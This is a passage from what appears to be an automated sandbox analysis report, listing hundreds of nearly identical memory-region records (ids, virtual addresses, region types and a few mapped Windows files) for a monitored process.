"c:\\windows\\syswow64\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 1310 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1311 start_va = 0x380000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 1312 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1313 start_va = 0x25e0000 end_va = 0x28aefff entry_point = 0x25e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1314 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1315 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1316 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1317 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1318 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1319 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1320 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1321 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1322 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1323 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1324 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1325 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1326 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1327 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1328 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1329 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1330 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1331 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1332 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1333 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1334 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1335 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1336 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1337 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1338 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1339 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1340 start_va = 0x2f0000 end_va = 
0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1341 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1342 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1343 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1344 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1345 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1346 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1347 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1348 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1349 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1350 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1351 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1352 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1353 start_va = 
0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1354 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1355 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1356 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1357 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1358 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1359 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1360 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1361 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1362 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1363 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1365 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1366 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 
1367 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1368 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1369 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1370 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1371 start_va = 0x380000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 1372 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1373 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1374 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1375 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1376 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1377 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1378 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1379 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" 
Region: id = 1380 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1381 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1382 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1383 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1384 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1385 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1386 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1387 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1388 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1389 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1390 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1391 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1392 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002f0000" filename = "" Region: id = 1393 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1394 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1395 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1396 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1397 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1398 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1399 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1400 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1401 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1402 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1403 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1404 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1405 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1406 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1407 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1408 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1409 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1410 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1411 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1412 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1413 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1414 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1415 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1416 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1417 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1418 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 
0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1419 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1420 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1421 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1422 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1423 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1424 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1425 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1426 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1427 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1428 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1429 start_va = 0x380000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 1430 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1431 start_va = 0x2f0000 end_va = 0x2f7fff 
entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1432 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1433 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1434 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1435 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1436 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1437 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1438 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1439 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1440 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1441 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1442 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1443 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1444 start_va = 0x2f0000 
end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1445 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1446 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1447 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1448 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1449 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1450 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1451 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1452 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1453 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1454 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1455 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1456 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1457 
start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1458 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1459 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1460 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1461 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1462 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1463 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1464 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1465 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1466 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1467 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1468 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1469 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" 
Region: id = 1470 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1471 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1472 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1473 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1474 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1475 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1476 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1477 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1478 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1479 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1480 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1481 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1482 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x00000000002f0000" filename = "" Region: id = 1483 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1484 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1485 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1486 start_va = 0x2f0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 1487 start_va = 0x380000 end_va = 0x387fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 1488 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1489 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1490 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1491 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1492 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1493 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1494 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1495 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed 
name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1496 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1497 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1498 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1499 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1500 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1501 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1502 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1503 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1504 start_va = 0x2f0000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 